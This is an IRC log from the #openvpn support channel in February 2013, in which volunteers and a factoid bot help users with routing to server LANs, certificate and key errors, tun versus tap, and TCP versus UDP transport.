[nobody@hemp.ircpimps.org] has quit [Changing host] 02:05 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 02:05 -!- mode/#openvpn [+o krzee] by ChanServ 02:16 -!- Devastator- [~devas@186.214.110.17] has quit [Read error: Connection reset by peer] 02:16 -!- Devastator [~devas@186.214.110.17] has joined #openvpn 02:17 -!- mikeybs [~michael@cpe-67-248-128-94.nycap.res.rr.com] has joined #openvpn 02:18 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 02:20 < mikeybs> I'm trying to get access to the LAN behind the server from the client, right now when I connect I can ping the server by it's LAN IP, but I can not ping anything else on the server LAN, running on arch linux, I have packet forwarding enabled, and I have the NIC in promiscious mode 02:22 -!- baobeiiii__ [~baobeiiii@180.155.14.35] has quit [Quit: Leaving] 02:25 < odoacre> !obfsproxy 02:25 <@vpnHelper> "obfsproxy" is (#1) For a writeup on using obfsproxy with OpenVPN see https://syria.hacktivist.me/?p=148 or (#2) See also !obfs. The link to TrafficObfuscation also contains a setup example 02:27 <@krzee> mikeybs, 02:27 <@krzee> !route_outside_ovpn 02:27 <@vpnHelper> "route_outside_ovpn" is "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png 02:28 < mikeybs> yup, thanks, I am just finding it on my own as well :) 02:28 < mikeybs> I had found it earlier, but it didn't make sense to me, then another forum post did 02:28 < mikeybs> but thanks for helping, appreciate it! 02:29 <@krzee> yw 02:34 < mikeybs> hmm, now I can ping the router on the server LAN, but none of the other hosts on the server LAN except the server itself 02:36 < mikeybs> I have an openbsd router on the server side 02:36 < mikeybs> did this on it 02:36 < mikeybs> route add -net 10.8.0.0/24 192.168.0.115 02:36 < mikeybs> add net 10.8.0.0/24: gateway 192.168.0.115 02:37 < mikeybs> seems like it worked cause I can now ping the router openbsd router itself 02:39 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 02:50 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 03:06 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 03:08 -!- mirco_ [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 03:11 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 244 seconds] 03:11 -!- mirco_ is now known as mirco 03:13 -!- sitaktif [~sitaktif@kollok.org] has quit [Quit: The Screen is dead, long live the screen!] 03:24 -!- sitaktif [~sitaktif@kollok.org] has joined #openvpn 03:49 -!- brute11k1 [~brute11k@89.249.235.210] has joined #openvpn 03:50 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 252 seconds] 04:40 -!- erry_ is now known as erry 04:51 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 04:52 -!- Devastator [~devas@186.214.110.17] has quit [Changing host] 04:52 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 04:57 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has joined #openvpn 05:01 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 252 seconds] 06:09 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 06:44 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds] 06:48 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:04 -!- master_of_master [~master_of@87.181.77.103] has quit [Ping timeout: 252 seconds] 07:06 -!- master_of_master [~master_of@p57B55327.dip.t-dialin.net] has joined #openvpn 07:10 -!- p3rror [~mezgani@41.249.146.72] has joined #openvpn 07:17 < surfmasta> when i kill openvpn and restart < 1-2 seconds it gets old data pushed to the client, when i wait a little then not, is there a switch so that the openvpn tries to pull always new configuration? 07:25 -!- Teck7__ is now known as rfxn 07:43 < defswork> I'm getting bad source address from client for the internet facing IP address of the client 07:44 < defswork> routing muck up somehow ? 07:44 < defswork> or SNATTing stuff it shouldnt 07:44 -!- mattock is now known as mattock_afk 07:48 < defswork> SNAT 0 -- 192.168.15.0/24 0.0.0.0/0 to:93.12.11.145 07:48 < defswork> that wont do much good 07:49 < defswork> hmm specific to eth1 only so should be ok 08:05 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 08:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 08:29 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Remote host closed the connection] 08:29 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 08:43 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:20 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 09:20 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 09:25 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 09:35 -!- p3rror [~mezgani@41.249.146.72] has quit [Read error: Operation timed out] 09:35 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 264 seconds] 09:35 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 264 seconds] 09:35 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 09:36 -!- samba35 [~shrikant@unaffiliated/samba35] has joined #openvpn 09:38 -!- samba35 [~shrikant@unaffiliated/samba35] has quit [Client Quit] 09:44 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 09:46 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 09:46 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 09:56 < dpecka> stupid Q: .. one of keys is bad obviously .. how can I print out the ca for given client.crt ?\ 09:56 < pekster> You can get the Issuer fields (and all other x509 fields in any cert) by doing: openssl x509 -in file.crt -noout -text 09:56 < pekster> I think that's what you wanted, right? You want to see "which" CA signed that particular cert? 09:56 < dpecka> thanks 09:57 < dpecka> exactly 09:57 -!- odoacre [~antonio@us.happylatte.com] has quit [Ping timeout: 256 seconds] 09:57 -!- odoacre [~antonio@us.happylatte.com] has joined #openvpn 09:58 < pekster> Yup, that's it then. Pay attention to the 'X509v3 Authority Key Identifier' as the issuer Subject DN is just text that could in theory match anyone's CA who used that as the "name" of the CA 09:58 -!- Kalavera [~Kalavera@aquiles.novelix.com.pe] has joined #openvpn 10:00 < Kalavera> greetings guys for some reason my vpn has stopped to work , I can ping the tun0 interface of the vpn server also the ethernet interface that looks to the lan but can reaches it from the client server 10:00 < dpecka> pekster: it seems same .. wt* .. client on windows spits out this: 10:00 < dpecka> Fri Feb 22 16:56:59 2013 Cannot load private key file C:\Program Files (x86)\OpenVPN\config\zkorinek.key: error:0906D06C:PEM routines:PEM_read_bio:no start line: error:140B0009:SSL routines:SSL_CTX_use_PrivateKey_file:PEM lib 10:00 < dpecka> Fri Feb 22 16:56:59 2013 Error: private key password verification failed 10:01 < dpecka> pekster: i compared that to client.crt which works 10:01 < pekster> Wrong password for the private key it seems 10:01 < dpecka> there's no password protecting the key 10:01 < pekster> Oh, it can't find the key is why 10:02 < pekster> "Cannot load private key file" 10:02 < pekster> Post your config on the client; it's probably either not where you expect it to be, or the path isn't quoted/escaped properly 10:02 < pekster> You need something like: key "C:\\some where\\file.key" 10:03 < pekster> quoted (for the spaces) and escaped (for the path seperator) 10:04 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 255 seconds] 10:04 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 255 seconds] 10:04 < dpecka> pekster: path is fine .. i have same setup for more clients which work .. i think there's some problem with cert 10:06 < pekster> !factoids search verify 10:06 <@vpnHelper> "certverify" is (#1) verify your certs are signed correctly by running `openssl verify -CAfile ` for client.crt and server.crt or (#2) also make sure you use the same ca.crt on both sides by checking their md5 10:06 < pekster> dpecka: See #1 there 10:07 < pekster> Now, it's possible the cert doesn't match the private key (the cert contains the "public" part of the keypair, plus the CA's signature on top of it marking it as "trusted" when the server checks it against its own copy of the ca.crt 10:07 < pekster> In that case you'd need to re-create a keypair and have the CA sign it 10:08 < pekster> (you can either create a new request from the private key, or better might just be to re-issue the keypair if you use easy-rsa or something since it won't support "out of the box" doing a CSR from a private key 10:09 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:11 < dpecka> pekster: thanks .. i generated new key and it works .. 10:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 10:33 -!- Kalavera [~Kalavera@aquiles.novelix.com.pe] has left #openvpn [] 10:42 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 11:07 -!- surfmasta [~bart@80.92.88.10] has quit [Quit: Leaving] 11:08 -!- jthunder [~jthunder@174.3.126.51] has quit [Ping timeout: 264 seconds] 11:10 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 11:13 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 11:20 -!- JesseC [~JesseCWor@wsip-98-175-20-126.br.br.cox.net] has quit [Ping timeout: 244 seconds] 11:32 -!- dazo_afk is now known as dazo 11:48 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 12:02 < JackSparrow> if i have two servers (using 10.0.1.0/24 and 10.0.2.0/24), how can i connect clients from the first server to clients from second server ? 12:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 12:07 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 12:12 < pekster> JackSparrow: First you need a functional setup you can ping across (VPN server IP <--> VPN client IP.) Then, follow each of these guides/flowcharts to get access to eacn LAN: 12:12 < pekster> !serverlan 12:12 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 12:12 < pekster> !clientlan 12:12 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 12:12 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 12:13 < JackSparrow> pekster: thank you! 12:20 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Read error: Connection reset by peer] 12:28 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 12:38 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 12:41 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 252 seconds] 12:48 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:00 -!- EugeneKay [eugene@madeitwor.se] has quit [Remote host closed the connection] 13:00 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn 13:03 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn 13:05 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 13:32 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has joined #openvpn 13:33 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has quit [Client Quit] 13:54 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 14:22 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 14:46 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 252 seconds] 14:51 -!- k1ng [~k1ng@unaffiliated/k1ng] has left #openvpn ["Leaving"] 14:52 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 14:54 -!- dazo is now known as dazo_afk 15:08 -!- Orbi [~opera@109.129.1.224] has joined #openvpn 15:08 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 15:11 -!- pcdummy [~quassel@unaffiliated/pcdummy] has joined #openvpn 15:12 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 15:12 < pcdummy> hi, i followed the following howto to build a VPN to my KVM libvirt Network, but i can't ping trough it, someone here wanna help me with it? 15:12 < pcdummy> http://deathegg.student.utwente.nl/wiki/Knowledge:OpenVPN#Bridging_OpenVPN_.28Server.29 15:12 <@vpnHelper> Title: Knowledge:OpenVPN - Death Egg (at deathegg.student.utwente.nl) 15:13 < pcdummy> It seams like a routing/NAT problem, but i'm at the end of my knowledge. 15:13 -!- brute11k1 [~brute11k@89.249.235.210] has quit [Ping timeout: 255 seconds] 15:13 < pcdummy> I get a lot of these lines on the server: Feb 22 22:07:14 srvvm1 ovpn-server[25554]: rkistl/213.163.240.86:11603 MULTI: Learn: 40:00:40:06:b0:b7 -> rkistl/213.163.240.86:11603 15:14 < pcdummy> rkistl is my VPN key and its my current public ip. 15:16 < pcdummy> http://pastie.org/6318814 <-- my current iptables output 15:18 < pcdummy> http://pastie.org/6318827 <-- seems like i need another Forward rule? 15:19 < zhvtar> pcdummy: is this behind nat router? if so, may need to set up route info 15:19 < pcdummy> zhvtar: it isn't. 15:20 < pekster> pcdummy: Whta's the end-goal here? 15:20 < pcdummy> zhvtar: the problem is the kvm virbr2 its bridging i think. 15:20 < pcdummy> pekster: i want a direct network with the kvm machines on the host. 15:20 < pekster> What is a "direct network" 15:20 < zhvtar> haven't done bridging yet. sorry i can't help. 15:21 < pcdummy> pekster: same ip, same UDP 15:21 < pekster> huh? You can't have 2 machines with the sam IP 15:21 < pcdummy> broadcast and so on 15:21 < pcdummy> pekster: same network 15:22 < pekster> What's the purpose though? If you just want IP connectivity (including UDP) then you don't need bridging at all 15:22 < pekster> !tunortap 15:22 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 15:22 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 15:22 < pekster> If you need something besides IP/TCP/UDP you should clarify 15:22 < pekster> !goal 15:22 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 15:25 < pcdummy> pekster: ok, ... i go back to the easy setup. 15:30 -!- Makenai [~Makenai@78.129.218.107] has joined #openvpn 15:30 < Makenai> !welcome 15:30 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 15:31 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 15:31 < Makenai> !route 15:31 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 15:38 < pekster> !learn route as See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs behind the server or client 15:38 <@vpnHelper> Joo got it. 15:42 -!- Makenai [~Makenai@78.129.218.107] has quit [Ping timeout: 248 seconds] 15:46 -!- Makenai [~Makenai@78.129.218.107] has joined #openvpn 15:47 < zhvtar> !serverlan 15:47 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 16:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:04 -!- Alberts00 [~Makenai@91.105.79.97] has joined #openvpn 16:06 -!- Makenai [~Makenai@78.129.218.107] has quit [Ping timeout: 255 seconds] 16:16 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Read error: Operation timed out] 16:23 -!- Makenai [~Makenai@beaver.feralhosting.com] has joined #openvpn 16:24 -!- Alberts00 [~Makenai@91.105.79.97] has quit [Ping timeout: 252 seconds] 16:24 -!- Alberts00 [~Makenai@78.129.218.107] has joined #openvpn 16:27 -!- zhvtar is now known as abowman 16:27 -!- abowman [~zhvtar@unaffiliated/zhvtar] has quit [Excess Flood] 16:27 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn 16:27 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Changing host] 16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has quit [Excess Flood] 16:27 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn 16:27 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Excess Flood] 16:27 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn 16:27 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Changing host] 16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has quit [Excess Flood] 16:27 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn 16:27 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Changing host] 16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has quit [Excess Flood] 16:27 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn 16:27 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Changing host] 16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 16:28 -!- Makenai [~Makenai@beaver.feralhosting.com] has quit [Ping timeout: 260 seconds] 16:29 -!- Alberts00 [~Makenai@78.129.218.107] has quit [Ping timeout: 246 seconds] 16:35 -!- Orbi [~opera@109.129.1.224] has left #openvpn [] 16:41 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 16:44 < mikeybs> so I'm guessing my problem has something to do with my router configuration on my server lan, but I'm not sure what the issue is.... 16:45 < mikeybs> I can ping from VPN client to VPN server both the server VPN IP as well as the server LAN IP 16:45 < mikeybs> I can also ping the LAN router from the VPN client 16:46 < mikeybs> but I can not ping any other hosts on the LAN 16:46 < mikeybs> I've added a route to the router for the VPN 16:47 < mikeybs> 10.8.0/24 192.168.0.115 16:48 < mikeybs> all of that refers to the server LAN, I am not concerned with the client LAN, at least not yet... lol 16:49 < mikeybs> server LAN access from the client is the biggest requirement 16:51 < mikeybs> can anyone confirm that this scenario is conclusively a misconfigured server LAN router? 16:51 < mikeybs> I am running an openbsd router, but I am not an expert with it, I just use it for a basic NAT router with some port forwarding to the internal network 16:53 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 16:53 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 16:54 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 260 seconds] 16:55 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 16:56 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 16:56 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 16:58 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 16:58 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 16:58 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 255 seconds] 17:05 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 17:19 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 17:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds] 17:31 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:42 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 17:43 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 18:06 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 18:08 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 248 seconds] 18:09 -!- ppr is now known as peper 18:13 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has joined #openvpn 18:14 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 18:19 -!- p3rror [~mezgani@41.249.146.72] has joined #openvpn 18:35 -!- nutron [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection] 18:39 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 18:41 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 18:47 -!- nutron [~nutron@unaffiliated/nutron] has quit [Read error: Connection reset by peer] 18:47 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 246 seconds] 18:48 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 19:02 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 19:22 -!- spitf1r3 [~quassel@89.200.144.70] has quit [Read error: Connection reset by peer] 19:23 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 19:23 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 19:23 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:23 -!- mode/#openvpn [+o krzee] by ChanServ 19:26 -!- novaflash is now known as novaflash_away 19:39 -!- roboman2444 [~roboman24@unaffiliated/roboman2444] has joined #openvpn 19:39 < roboman2444> is it possible to comp[ile a statically linked openvpn? 19:39 < roboman2444> so no lib dependencies 19:41 < EugeneKay> Yes. man gcc 19:42 < EugeneKay> There are also a few google results of interest for "openvpn compile static" 19:46 <@krzee> commonly used for embedded devices 20:06 <+hazardous> hi krzee~ 20:07 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has quit [Quit: Leaving] 20:29 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 260 seconds] 20:30 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 20:35 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 20:35 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Read error: Connection reset by peer] 20:37 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Read error: Connection reset by peer] 20:38 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 20:38 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 21:29 -!- mail323 [~mail323@c-98-254-82-94.hsd1.fl.comcast.net] has joined #openvpn 21:41 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 21:59 -!- neverme [neverme@177.182.58.82] has joined #openvpn 22:00 -!- mail323 [~mail323@c-98-254-82-94.hsd1.fl.comcast.net] has left #openvpn [] 22:00 < neverme> Is there a significant difference from using OpenVPN on tcp over udp ? for instance if all clients connecting to it have a higher download speed then they have their upload speed would having the server set on tcp be actually better in the end ? an example would be a 20mb download with 1mb upload internet 22:01 < neverme> or am I talking shit and udp will be superior in all cases or is there a specific case I will want tcp over it ? 22:02 < neverme> I understand that tcp will wait for confirmation and stuff, while udp wont or something like that I mean I know the basic of how both work handshake etc 22:11 -!- p3rror [~mezgani@41.249.146.72] has quit [Ping timeout: 248 seconds] 22:11 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 22:13 -!- neverme [neverme@177.182.58.82] has quit [Quit: Leaving] 22:23 < EugeneKay> !fail2ban 22:23 <@vpnHelper> "fail2ban" is in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT 22:38 <@krzee> hey hazardous 22:38 <@krzee> !tcp 22:38 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 22:45 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has quit [Remote host closed the connection] 22:51 -!- dsii [allan@hijacked.us] has joined #openvpn 22:51 < dsii> !fail2ban 22:51 <@vpnHelper> "fail2ban" is in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT 22:56 <+hazardous> why is tcp over tcp bad ;o 23:00 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 23:00 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 23:14 < EugeneKay> Read the page 23:14 < EugeneKay> It explains it 23:54 -!- Teck7 [~teck7@bas1-montreal54-1279376358.dsl.bell.ca] has joined #openvpn 23:56 -!- rfxn [~teck7@69.157.154.143] has quit [Ping timeout: 248 seconds] --- Day changed Sat Feb 23 2013 00:02 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 01:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 02:07 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 02:16 -!- dazo_afk is now known as dazo 02:16 -!- Orbi [~opera@109.129.18.157] has joined #openvpn 02:34 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Read error: Connection reset by peer] 02:34 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 03:36 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 03:57 -!- Orbi [~opera@109.129.18.157] has quit [Ping timeout: 252 seconds] 03:58 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 252 seconds] 04:13 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 04:33 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 04:43 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 04:45 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Client Quit] 04:46 -!- novaflash_away is now known as novaflash 04:50 -!- discojoe [~wtf@78.157.218.55] has joined #openvpn 04:52 < discojoe> why cant i access my openvpn server ip? vpn works, i can access all web etc... except site hosted on same server vpn is run 04:53 < discojoe> do i need to add something in firewall/iptables? 04:54 < pekster> Why do you assume the vpn works? Why would accessing "all web etc" demonstrate this? 04:54 < discojoe> i can connect to vpn 04:55 < pekster> That doesn't mean you can send traffic over it necessarily. The traditional test to see if the VPN link is up is to ping the server. If the server drops/firewalls this traffic, you're going to have a very hard time showing that the VPN is configured correctly 04:55 < discojoe> then open everything execpt ip or domain that is hosted on same server 04:56 < discojoe> i can ping server 04:57 < pekster> You can ping the server's VPN IP address? 04:58 < discojoe> yes sir 04:58 < pekster> Then your VPN is working. Anything else is a routing/firewall problem 04:58 < pekster> (firewall in the case of accessing a service on the VPN IP of the server itself) 04:58 -!- FellowTraveler [~Adium@opentransactions/dev/FellowTraveler] has joined #openvpn 04:59 < discojoe> ok, so i need to allow access to server ip thru vpn 04:59 < discojoe> will start playing around with ti 04:59 < discojoe> thanks pekster 04:59 -!- gffa [~unknown@unaffiliated/gffa] has joined 